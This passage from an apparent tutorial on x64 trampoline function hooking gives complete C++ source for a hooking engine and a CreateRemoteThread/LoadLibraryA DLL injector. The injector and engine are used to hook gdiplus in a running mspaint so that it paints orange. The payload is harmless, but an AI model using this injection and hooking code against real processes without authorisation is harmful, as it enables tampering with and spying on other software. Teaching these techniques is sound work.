You’ve probably noticed that both of these functions return the number of bytes that they wrote to the AIT. This is so we can increment the absTableMem pointer in BuildTrampoline(). These calls should be added inside the IsRelativeJump()/IsRelativeCall() conditionals in the BuildTrampoline() function.

for (int i = 0; i < stolenInstrs.numInstructions; ++i)
{
  cs_insn& inst = stolenInstrs.instructions[i];
  if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE)
  {
    return 0; //bail out on loop instructions, I don't have a good way of handling them 
  }
  
  if (IsRIPRelativeInstr(inst))
  {
    RelocateInstruction(&inst, stolenByteMem);
  }
  else if (IsRelativeJump(inst))
  {
      uint32_t aitSize = AddJmpToAbsTable(inst, absTableMem);
      //rewrite inst here
      absTableMem += aitSize;
  }
  else if (IsRelativeCall(inst))
  {
      uint32_t aitSize = AddCallToAbsTable(inst, absTableMem, jumpBackMem);
      //rewrite inst here
      absTableMem += aitSize;
  }
  memcpy(stolenByteMem, inst.bytes, inst.size);
  stolenByteMem += inst.size;
}

Step 4: Rewriting Jumps/Calls to Use the AIT.

Adding instructions to the Absolute Instruction Table is great and all, but in order for any of that work to matter, we also need to rewrite our stolen relative instructions to actually go to the AIT. Similar to the last step, this needs to be handled differently for jumps vs calls.

Calls are the easier of the two to rewrite, so we’ll start with them. Since all call instructions are unconditional, we can replace any relative calls with jumps to the appropriate address inside the AIT. We know that our trampoline won’t be larger than 255 bytes, so we can use a 2 byte jmp instruction for this. We don’t want to change the size of the call instruction we’re rewriting, so we’ll first replace all the bytes for that instruction with NOPs. That way, if we rewrite a 4 byte call with a 2 byte jmp, we haven’t added garbage instructions to the trampoline.

void RewriteCallInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
  uint8_t distToJumpTable = absTableEntry - (instrPtr + instr->size);

  //calls need to be rewritten as relative jumps to the abs table
  //but we want to preserve the length of the instruction, so pad with NOPs
  uint8_t jmpBytes[2] = { 0xEB, distToJumpTable };
  memset(instr->bytes, 0x90, instr->size);
  memcpy(instr->bytes, jmpBytes, sizeof(jmpBytes));
}

Jumps are more of a pain. There are a lot of different jump instructions that we might encounter, many of which are some flavor of a conditional jump. We can’t replace these instructions with a normal jmp because that could change the execution logic of our stolen bytes. Instead we need to rewrite the operands directly, so that these jumps will conditionally jump to the Absolute Instruction Table.

void RewriteJumpInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
  uint8_t distToJumpTable = absTableEntry - (instrPtr + instr->size); 

  //jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand
  //rewrite the operand for the jump to go to the jump table
  uint8_t instrByteSize = instr->bytes[0] == 0x0F ? 2 : 1;
  uint8_t operandSize = instr->size - instrByteSize;

  switch (operandSize)
  {
  case 1: {instr->bytes[instrByteSize] = distToJumpTable; }break;
  case 2: {uint16_t dist16 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist16, 2); } break;
  case 4: {uint32_t dist32 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist32, 4); } break;
  }
}

The snippet below shows how these new functions should be added to BuildTrampoline(). Notice that we need to wait until after calling these new rewrite functions before we can increment the absTableMem pointer.

uint32_t BuildTrampoline(void* func2hook, void* dstMemForTrampoline)
{
  X64Instructions stolenInstrs = StealBytes(func2hook);

  uint8_t* stolenByteMem = (uint8_t*)dstMemForTrampoline;
  uint8_t* jumpBackMem = stolenByteMem + stolenInstrs.numBytes;
  uint8_t* absTableMem = jumpBackMem + 13; //13 is the size of a 64 bit mov/jmp instruction pair

  for (int i = 0; i < stolenInstrs.numInstructions; ++i) {

    cs_insn& inst = stolenInstrs.instructions[i];
    if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE){
      return 0; //bail out on loop instructions, I don't have a good way of handling them 
    }

    if (IsRelativeJump(inst)){
      uint32_t aitSize = AddJmpToAbsTable(inst, absTableMem);
      RewriteJumpInstruction(&inst, stolenByteMem, absTableMem);
      absTableMem += aitSize; 
    }
    else if (inst.id == X86_INS_CALL){
      uint32_t aitSize = AddCallToAbsTable(inst, absTableMem, jumpBackMem);
      RewriteCallInstruction(&inst, stolenByteMem, absTableMem);
      absTableMem += aitSize;
    }

    //write stolen instruction (rewritten or otherwise) to trmapoline mem
    memcpy(stolenByteMem, inst.bytes, inst.size);
    stolenByteMem += inst.size;
  }

   //write jump back to hooked func

  free(stolenInstrs.instructions);
  return uint32_t( (uint8_t*)absTableMem - dstMemForTrampoline);
}

Step 5: Write the Jump Back to the Hooked Function’s Body

This has been a long process, but we’re almost there. Now we need to fill in the middle of the jump sandwich, and return our trampoline’s size. After all the work we’ve done so far, this last step doesn’t need much explanation. All we need to do is replace the comment in the snippet above with the following:

WriteAbsoluteJump64(jumpBackMem, (uint8_t*)func2hook + 5);

When we stole the bytes from func2hook, we also replaced them with NOP instructions. This makes our life easier here, since the jump back to our hooked function doesn’t have to care about the number of bytes we stole. Jumping to the byte immediately after the hook’s jump is guaranteed to be safe.

Finally we return the byte count of our trampoline, so that InstallHook() can write the relay function into memory right after our trampoline bytes.

void InstallHook(void* func2hook, void* payloadFunc, void** trampolinePtr)
{
  DWORD oldProtect;
  VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

  void* hookMemory = AllocatePageNearAddress(func2hook);
  uint32_t trampolineSize = BuildTrampoline(func2hook, hookMemory);
  *trampolinePtr = hookMemory;

  //create the relay function
  void* relayFuncMemory = (char*)hookMemory + trampolineSize;
  WriteAbsoluteJump64(relayFuncMemory, payloadFunc); //write relay func instructions

  //install the hook
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
  const int32_t relAddr = (int32_t)relayFuncMemory - ((int32_t)func2hook + sizeof(jmpInstruction));
  memcpy(jmpInstruction + 1, &relAddr, 4);
  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

aaaaand we’re done! The collapsebox below shows the full source for a program that uses this trampoline to hook a function. We’ve already talked about all the fun parts, so I’m going to leave it here without comment and move on to the grand finale.

Full Example of Trampoline Hooking a Function In The Same Process As The Hook Code

#include <stdio.h>
#include <cstdlib>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include <vector>
#include <Windows.h>

__declspec(noinline) void TargetFunc(int x, float y)
{
    if (x > 0) printf("Target Func: x > 0\n");
 }

void(*TargetFuncTrampoline)(int, float) = nullptr;
void HookPayload(int x, float y)
{
    printf("Hook executed\n");
    TargetFuncTrampoline(x + 1, y);
}

void* AllocatePageNearAddress(void* targetAddr)
{
    SYSTEM_INFO sysInfo;
    GetSystemInfo(&sysInfo);
    const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

    uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
    uint64_t minAddr = min(startAddr - 0x7FFFFF00, (uint64_t)sysInfo.lpMinimumApplicationAddress);
    uint64_t maxAddr = max(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);

    uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

    uint64_t pageOffset = 1;
    while (1)
    {
        uint64_t byteOffset = pageOffset * PAGE_SIZE;
        uint64_t highAddr = startPage + byteOffset;
	    	uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

        bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

        if (highAddr < maxAddr)
        {
            void* outAddr = VirtualAlloc((void*)highAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr)
                return outAddr;
        }

        if (lowAddr > minAddr)
        {
            void* outAddr = VirtualAlloc((void*)lowAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr != nullptr)
                return outAddr;
        }

        pageOffset++;

        if (needsExit)
        {
            break;
        }
    }

    return nullptr;
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
    uint8_t absJumpInstructions[] = { 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                      0x41, 0xFF, 0xE2 };

    uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
    memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
    memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
}

struct X64Instructions
{
    cs_insn* instructions;
    uint32_t numInstructions;
    uint32_t numBytes;
};

X64Instructions StealBytes(void* function)
{
    // Disassemble stolen bytes
    csh handle;
    cs_open(CS_ARCH_X86, CS_MODE_64, &handle);
    cs_option(handle, CS_OPT_DETAIL, CS_OPT_ON); // we need details enabled for relocating RIP relative instrs

    size_t count;
    cs_insn* disassembledInstructions; //allocated by cs_disasm, needs to be manually freed later
    count = cs_disasm(handle, (uint8_t*)function, 20, (uint64_t)function, 20, &disassembledInstructions);

    //get the instructions covered by the first 5 bytes of the original function
    uint32_t byteCount = 0;
    uint32_t stolenInstrCount = 0;
    for (int32_t i = 0; i < count; ++i)
    {
        cs_insn& inst = disassembledInstructions[i];
        byteCount += inst.size;
        stolenInstrCount++;
        if (byteCount >= 5) break;
    }

    //replace instructions in target func wtih NOPs
    memset(function, 0x90, byteCount);

    cs_close(&handle);
    return { disassembledInstructions, stolenInstrCount, byteCount };
}

bool IsRelativeJump(cs_insn& inst)
{
    bool isAnyJumpInstruction = inst.id >= X86_INS_JAE && inst.id <= X86_INS_JS;
    bool isJmp = inst.id == X86_INS_JMP;
    bool startsWithEBorE9 = inst.bytes[0] == 0xEB || inst.bytes[0] == 0xE9;
    return isJmp ? startsWithEBorE9 : isAnyJumpInstruction;
}

bool IsRelativeCall(cs_insn& inst)
{
    bool isCall = inst.id == X86_INS_CALL;
    bool startsWithE8 = inst.bytes[0] == 0xE8;
    return isCall && startsWithE8;
}

void RewriteJumpInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
    uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size));

    //jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand
    //rewrite the operand for the jump to go to the jump table
    uint8_t instrByteSize = instr->bytes[0] == 0x0F ? 2 : 1;
    uint8_t operandSize = instr->size - instrByteSize;

    switch (operandSize)
    {
    case 1: instr->bytes[instrByteSize] = distToJumpTable; break;
    case 2: {uint16_t dist16 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist16, 2); } break;
    case 4: {uint32_t dist32 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist32, 4); } break;
    }
}


void RewriteCallInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
    uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size));

    //calls need to be rewritten as relative jumps to the abs table
    //but we want to preserve the length of the instruction, so pad with NOPs
    uint8_t jmpBytes[2] = { 0xEB, distToJumpTable };
    memset(instr->bytes, 0x90, instr->size);
    memcpy(instr->bytes, jmpBytes, sizeof(jmpBytes));
}

uint32_t AddJmpToAbsTable(cs_insn& jmp, uint8_t* absTableMem)
{
    char* targetAddrStr = jmp.op_str; //where the instruction intended to go
    uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);
    WriteAbsoluteJump64(absTableMem, (void*)targetAddr);
    return 13; //size of mov/jmp instrs for absolute jump
}

uint32_t AddCallToAbsTable(cs_insn& call, uint8_t* absTableMem, uint8_t* jumpBackToHookedFunc)
{
    char* targetAddrStr = call.op_str; //where the instruction intended to go
    uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);

    uint8_t* dstMem = absTableMem;

    uint8_t callAsmBytes[] =
    {
      0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into r10
      0x41, 0xFF, 0xD2, //call r10
    };
    memcpy(&callAsmBytes[2], &targetAddr, sizeof(void*));
    memcpy(dstMem, &callAsmBytes, sizeof(callAsmBytes));
    dstMem += sizeof(callAsmBytes);

    //after the call, we need to add a second 2 byte jump, which will jump back to the 
      //final jump of the stolen bytes
    uint8_t jmpBytes[2] = { 0xEB, uint8_t(jumpBackToHookedFunc - (absTableMem + sizeof(jmpBytes))) };
    memcpy(dstMem, jmpBytes, sizeof(jmpBytes));

    return sizeof(callAsmBytes) + sizeof(jmpBytes); //15
}

bool IsRIPRelativeInstr(cs_insn& inst)
{
    cs_x86* x86 = &(inst.detail->x86);

    for (uint32_t i = 0; i < inst.detail->x86.op_count; i++)
    {
        cs_x86_op* op = &(x86->operands[i]);

        //mem type is rip relative, like lea rcx,[rip+0xbeef]
        if (op->type == X86_OP_MEM)
        {
            //if we're relative to rip
            return op->mem.base == X86_REG_RIP;
        }
    }

    return false;
}

template<class T>
T GetDisplacement(cs_insn* inst, uint8_t offset)
{
    T disp;
    memcpy(&disp, &inst->bytes[offset], sizeof(T));
    return disp;
}

//rewrite instruction bytes so that any RIP-relative displacement operands
//make sense with wherever we're relocating to
void RelocateInstruction(cs_insn* inst, void* dstLocation)
{
    cs_x86* x86 = &(inst->detail->x86);
    uint8_t offset = x86->encoding.disp_offset;

    uint64_t displacement = inst->bytes[x86->encoding.disp_offset];
    switch (x86->encoding.disp_size)
    {
    case 1:
    {
        int8_t disp = GetDisplacement<uint8_t>(inst, offset);
        disp -= int8_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 1);
    }break;

    case 2:
    {
        int16_t disp = GetDisplacement<uint16_t>(inst, offset);
        disp -= int16_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 2);
    }break;

    case 4:
    {
        int32_t disp = GetDisplacement<int32_t>(inst, offset);
        disp -= int32_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 4);
    }break;
    }
}

uint32_t BuildTrampoline(void* func2hook, void* dstMemForTrampoline)
{
    X64Instructions stolenInstrs = StealBytes(func2hook);

    uint8_t* stolenByteMem = (uint8_t*)dstMemForTrampoline;
    uint8_t* jumpBackMem = stolenByteMem + stolenInstrs.numBytes;
    uint8_t* absTableMem = jumpBackMem + 13; //13 is the size of a 64 bit mov/jmp instruction pair

    for (uint32_t i = 0; i < stolenInstrs.numInstructions; ++i)
    {
        cs_insn& inst = stolenInstrs.instructions[i];
        if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE)
        {
            return 0; //bail out on loop instructions, I don't have a good way of handling them 
        }

        if (IsRIPRelativeInstr(inst))
        {
            RelocateInstruction(&inst, stolenByteMem);
        }
        else if (IsRelativeJump(inst))
        {
            uint32_t aitSize = AddJmpToAbsTable(inst, absTableMem);
            RewriteJumpInstruction(&inst, stolenByteMem, absTableMem);
            absTableMem += aitSize;
        }
        else if (inst.id == X86_INS_CALL)
        {
            uint32_t aitSize = AddCallToAbsTable(inst, absTableMem, jumpBackMem);
            RewriteCallInstruction(&inst, stolenByteMem, absTableMem);
            absTableMem += aitSize;
        }
        memcpy(stolenByteMem, inst.bytes, inst.size);
        stolenByteMem += inst.size;
    }

    WriteAbsoluteJump64(jumpBackMem, (uint8_t*)func2hook + 5);
    free(stolenInstrs.instructions);

    return uint32_t(absTableMem - (uint8_t*)dstMemForTrampoline);
}

void InstallHook(void* func2hook, void* payloadFunc, void** trampolinePtr)
{
    DWORD oldProtect;
    VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

    void* hookMemory = AllocatePageNearAddress(func2hook);
    uint32_t trampolineSize = BuildTrampoline(func2hook, hookMemory);
    *trampolinePtr = hookMemory;

    //create the relay function
    void* relayFuncMemory = (char*)hookMemory + trampolineSize;
    WriteAbsoluteJump64(relayFuncMemory, payloadFunc); //write relay func instructions

    //install the hook
    uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
    const int32_t relAddr = (int32_t)relayFuncMemory - ((int32_t)func2hook + sizeof(jmpInstruction));
    memcpy(jmpInstruction + 1, &relAddr, 4);
    memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

int main(int argc, const char** argv)
{
    TargetFunc(argc, 0);
    InstallHook(TargetFunc, HookPayload, (void**)&TargetFuncTrampoline);
    TargetFunc(0, 0);
}

Example 4: Using a Trampoline to Hook a Running Program

Like Po at the end of Kung Fu Panda, it’s time to put all our newfound skills to use and fulfill our destiny of becoming the dragon warrior.

The last example is going to use a trampoline to force mspaint to always use the color orange, no matter what color the user tries to select. This was shown in the gif at the start of article, but it’s been a long time since then, so here that gif is again:

Mercifully for us, we don’t need to go on an RVA fishing trip this time, because the function we want to hook is exported from a DLL. We’re going to install a hook into gdiplus.dll’s GdipSetSolidFillColor() function. Finding out that this was the right function to hook was pretty much the same process as the last mspaint example: lots of trial and error with breakpoints in x64dbg. A reverse engineer I am not.

So, here’s the plan:

Write a hook payload function that intercepts calls to GdipSetSolidFillColor and replaces the incoming function arguments with the color orange.
Put that payload in a DLL, along with all the hooking logic required to make it happen
Inject that DLL into a running instance of mspaint
Make beautiful artwork with the best color ever.

We’ve already exhaustively walked through a code example that used the same hooking logic that we need to use here. Rather than do that again, let’s focus on what’s different this time. Looking up GdipSetSolidFillColor() gives us this function signature:

GpStatus WINGDIPAPI GdipSetSolidFillColor(Gdiplus::GpSolidFill *brush, Gdiplus::ARGB color)

Recall that the ARGB type is a uint32 with each byte representing a color channel. This means that all our payload need to do to make things orange is set some bits and pass the new ARGB value to the trampoline:

Gdiplus::GpStatus(*GdipSetSolidFillColorTrampoline)(Gdiplus::GpSolidFill* brush, Gdiplus::ARGB color);
Gdiplus::GpStatus GdipSetSolidFillColorPayload(Gdiplus::GpSolidFill* brush, Gdiplus::ARGB color)
{
  Gdiplus::ARGB orange = 0xffff7700;
  return GdipSetSolidFillColorTrampoline(brush, orange);
}

This isn’t going to be enough to make ALL the possible painting tools spit out orange all the time. The paint can tool, spray paint brushes, etc will still use the colors selected. Our dll will just make most brushes always paint orange, which is good enough for me. It’ll also totally mess with the output of some brushes and make them operate weirdly too, which is fun in its own way.

Here’s a gif demonstrating some of the tools not painting orange, despite our dll being injected into paint:

The hooking logic that we include in the DLL is going to similar to the trampoline code we wrote for Example 3. The main difference is how we get a pointer to the function we want to hook.

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    HMODULE gdiPlusModule = FindModuleInProcess(GetCurrentProcess(), ("gdiplus.dll"));
    void* localHookFunc4 = GetProcAddress(gdiPlusModule, ("GdipSetSolidFillColor"));
    InstallHook(localHookFunc4, GdipSetSolidFillColorPayload);
  }
  return true;
}

The FindModuleInProcess() function called above is similar to the GetBaseModuleForProcess() function that we used in a previous example, except that it can look for any loaded module by string name. The function is a bit long, so rather than paste it here, I’ve included it in the complete source for this example. The program used to inject this dll into paint is the same as the one we used before, but it’s also included below.

It took a while to get here, but we’re finally done Example 4! Go celebrate by making beautiful orange artwork!

Full Source For DLL Injector Program (click to expand)

//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process
// usage: Injector_LoadLibrary <process name> <path to dll> 

#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h

void printHelp()
{
    printf("Injector_LoadLibrary\nUsage: Injector_LoadLibrary <process name> <path to dll>\n");
}

void createRemoteThread(DWORD processID, const char* dllPath)
{
    HANDLE handle = OpenProcess(
        PROCESS_QUERY_INFORMATION | //Needed to get a process' token
        PROCESS_CREATE_THREAD |    //for obvious reasons
        PROCESS_VM_OPERATION |    //required to perform operations on address space of process (like WriteProcessMemory)
        PROCESS_VM_WRITE,  //required for WriteProcessMemory
        FALSE,      //don't inherit handle
        processID);

    if (handle == NULL)
    {
        fprintf(stderr, "Could not open process with pid: %lu\n", processID);
        return;
    }

    //once the process is open, we need to write the name of our dll to that process' memory
    size_t dllPathLen = strlen(dllPath);
    void* dllPathRemote = VirtualAllocEx(
        handle,
        NULL, //let the system decide where to allocate the memory
        dllPathLen,
        MEM_COMMIT, //actually commit the virtual memory
        PAGE_READWRITE); //mem access for committed page

    if (!dllPathRemote)
    {
        fprintf(stderr, "Could not allocate %zd bytes in process with pid: %lu\n", dllPathLen, processID);
        return;
    }

    BOOL writeSucceeded = WriteProcessMemory(
        handle,
        dllPathRemote,
        dllPath,
        dllPathLen,
        NULL);

    if (!writeSucceeded)
    {
        fprintf(stderr, "Could not write %zd bytes to process with pid %lu\n", dllPathLen, processID);
        return;
    }

    //now get address of LoadLibraryW function inside Kernel32.dll
    //TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"
    PTHREAD_START_ROUTINE loadLibraryFunc = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryA");
    if (loadLibraryFunc == NULL)
    {
        fprintf(stderr, "Could not find LoadLibraryA function inside kernel32.dll\n");
        return;
    }

    //now create a thread in remote process that loads our target dll using LoadLibraryA

    HANDLE remoteThread = CreateRemoteThread(
        handle,
        NULL, //default thread security
        0, //stack size for thread
        loadLibraryFunc, //pointer to start of thread function (for us, LoadLibraryA)
        dllPathRemote, //pointer to variable being passed to thread function
        0, //0 means the thread runs immediately after creation
        NULL); //we don't care about getting back the thread identifier

    if (remoteThread == NULL)
    {
        fprintf(stderr, "Could not create remote thread.\n");
        return;
    }
    else
    {
        fprintf(stdout, "Success! remote thread started in process %d\n", processID);
    }

    // Wait for the remote thread to terminate
    WaitForSingleObject(remoteThread, INFINITE);

    //once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down
    VirtualFreeEx(handle, dllPathRemote, 0, MEM_RELEASE);
    CloseHandle(remoteThread);
    CloseHandle(handle);
}

DWORD findPidByName(const char* name)
{
    HANDLE h;
    PROCESSENTRY32 singleProcess;
    h = CreateToolhelp32Snapshot( //takes a snapshot of specified processes
        TH32CS_SNAPPROCESS, //get all processes
        0); //ignored for SNAPPROCESS

    singleProcess.dwSize = sizeof(PROCESSENTRY32);

    do {

        if (strcmp(singleProcess.szExeFile, name) == 0)
        {
            DWORD pid = singleProcess.th32ProcessID;
            printf("PID Found: %lu\n", pid);
            CloseHandle(h);
            return pid;
        }

    } while (Process32Next(h, &singleProcess));

    CloseHandle(h);

    return 0;
}

int main(int argc, const char** argv)
{
    if (argc != 3)
    {
        printHelp();
    }

    createRemoteThread(findPidByName(argv[1]), argv[2]);

    return 0;
}

Full Source For Example 4 (click to expand)

#include <cstdlib>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include <vector>
#include <Windows.h>
#include <gdiplus.h>
#include <Psapi.h>
#pragma comment (lib, "Gdiplus.lib")

Gdiplus::GpStatus(*GdipSetSolidFillColorTrampoline)(Gdiplus::GpSolidFill* brush, Gdiplus::ARGB color);
Gdiplus::GpStatus GdipSetSolidFillColorPayload(Gdiplus::GpSolidFill* brush, Gdiplus::ARGB color)
{
    Gdiplus::ARGB orange = 0xffff7700;
    return GdipSetSolidFillColorTrampoline(brush, orange);
}

void* AllocatePageNearAddress(void* targetAddr)
{
    SYSTEM_INFO sysInfo;
    GetSystemInfo(&sysInfo);
    const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

    uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
    uint64_t minAddr = min(startAddr - 0x7FFFFF00, (uint64_t)sysInfo.lpMinimumApplicationAddress);
    uint64_t maxAddr = max(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);

    uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

    uint64_t pageOffset = 1;
    while (1)
    {
        uint64_t byteOffset = pageOffset * PAGE_SIZE;
        uint64_t highAddr = startPage + byteOffset;
		    uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

        bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

        if (highAddr < maxAddr)
        {
            void* outAddr = VirtualAlloc((void*)highAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr)
                return outAddr;
        }

        if (lowAddr > minAddr)
        {
            void* outAddr = VirtualAlloc((void*)lowAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr != nullptr)
                return outAddr;
        }

        pageOffset++;

        if (needsExit)
        {
            break;
        }
    }

    return nullptr;
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
    uint8_t absJumpInstructions[] = { 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                      0x41, 0xFF, 0xE2 };

    uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
    memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
    memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
}

struct X64Instructions
{
    cs_insn* instructions;
    uint32_t numInstructions;
    uint32_t numBytes;
};

X64Instructions StealBytes(void* function)
{
    // Disassemble stolen bytes
    csh handle;
    cs_open(CS_ARCH_X86, CS_MODE_64, &handle);
    cs_option(handle, CS_OPT_DETAIL, CS_OPT_ON); // we need details enabled for relocating RIP relative instrs

    size_t count;
    cs_insn* disassembledInstructions; //allocated by cs_disasm, needs to be manually freed later
    count = cs_disasm(handle, (uint8_t*)function, 20, (uint64_t)function, 20, &disassembledInstructions);

    //get the instructions covered by the first 5 bytes of the original function
    uint32_t byteCount = 0;
    uint32_t stolenInstrCount = 0;
    for (int32_t i = 0; i < count; ++i)
    {
        cs_insn& inst = disassembledInstructions[i];
        byteCount += inst.size;
        stolenInstrCount++;
        if (byteCount >= 5) break;
    }

    //replace instructions in target func with NOPs
    memset(function, 0x90, byteCount);

    cs_close(&handle);
    return { disassembledInstructions, stolenInstrCount, byteCount };
}

bool IsRelativeJump(cs_insn& inst)
{
    bool isAnyJumpInstruction = inst.id >= X86_INS_JAE && inst.id <= X86_INS_JS;
    bool isJmp = inst.id == X86_INS_JMP;
    bool startsWithEBorE9 = inst.bytes[0] == 0xEB || inst.bytes[0] == 0xE9;
    return isJmp ? startsWithEBorE9 : isAnyJumpInstruction;
}

bool IsRelativeCall(cs_insn& inst)
{
    bool isCall = inst.id == X86_INS_CALL;
    bool startsWithE8 = inst.bytes[0] == 0xE8;
    return isCall && startsWithE8;
}

void RewriteJumpInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
    uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size));

    //jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand
    //rewrite the operand for the jump to go to the jump table
    uint8_t instrByteSize = instr->bytes[0] == 0x0F ? 2 : 1;
    uint8_t operandSize = instr->size - instrByteSize;

    switch (operandSize)
    {
    case 1: instr->bytes[instrByteSize] = distToJumpTable; break;
    case 2: {uint16_t dist16 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist16, 2); } break;
    case 4: {uint32_t dist32 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist32, 4); } break;
    }
}


void RewriteCallInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
    uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size));

    //calls need to be rewritten as relative jumps to the abs table
    //but we want to preserve the length of the instruction, so pad with NOPs
    uint8_t jmpBytes[2] = { 0xEB, distToJumpTable };
    memset(instr->bytes, 0x90, instr->size);
    memcpy(instr->bytes, jmpBytes, sizeof(jmpBytes));
}

uint32_t AddJmpToAbsTable(cs_insn& jmp, uint8_t* absTableMem)
{
    char* targetAddrStr = jmp.op_str; //where the instruction intended to go
    uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);
    WriteAbsoluteJump64(absTableMem, (void*)targetAddr);
    return 13; //size of mov/jmp instrs for absolute jump
}

uint32_t AddCallToAbsTable(cs_insn& call, uint8_t* absTableMem, uint8_t* jumpBackToHookedFunc)
{
    char* targetAddrStr = call.op_str; //where the instruction intended to go
    uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);

    uint8_t* dstMem = absTableMem;

    uint8_t callAsmBytes[] =
    {
      0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into r10
      0x41, 0xFF, 0xD2, //call r10
    };
    memcpy(&callAsmBytes[2], &targetAddr, sizeof(void*));
    memcpy(dstMem, &callAsmBytes, sizeof(callAsmBytes));
    dstMem += sizeof(callAsmBytes);

    //after the call, we need to add a second 2 byte jump, which will jump back to the 
      //final jump of the stolen bytes
    uint8_t jmpBytes[2] = { 0xEB, uint8_t(jumpBackToHookedFunc - (absTableMem + sizeof(jmpBytes))) };
    memcpy(dstMem, jmpBytes, sizeof(jmpBytes));

    return sizeof(callAsmBytes) + sizeof(jmpBytes); //15
}

bool IsRIPRelativeInstr(cs_insn& inst)
{
    cs_x86* x86 = &(inst.detail->x86);

    for (uint32_t i = 0; i < inst.detail->x86.op_count; i++)
    {
        cs_x86_op* op = &(x86->operands[i]);

        //mem type is rip relative, like lea rcx,[rip+0xbeef]
        if (op->type == X86_OP_MEM)
        {
            //if we're relative to rip
            return op->mem.base == X86_REG_RIP;
        }
    }

    return false;
}

template<class T>
T GetDisplacement(cs_insn* inst, uint8_t offset)
{
    T disp;
    memcpy(&disp, &inst->bytes[offset], sizeof(T));
    return disp;
}

//rewrite instruction bytes so that any RIP-relative displacement operands
//make sense with wherever we're relocating to
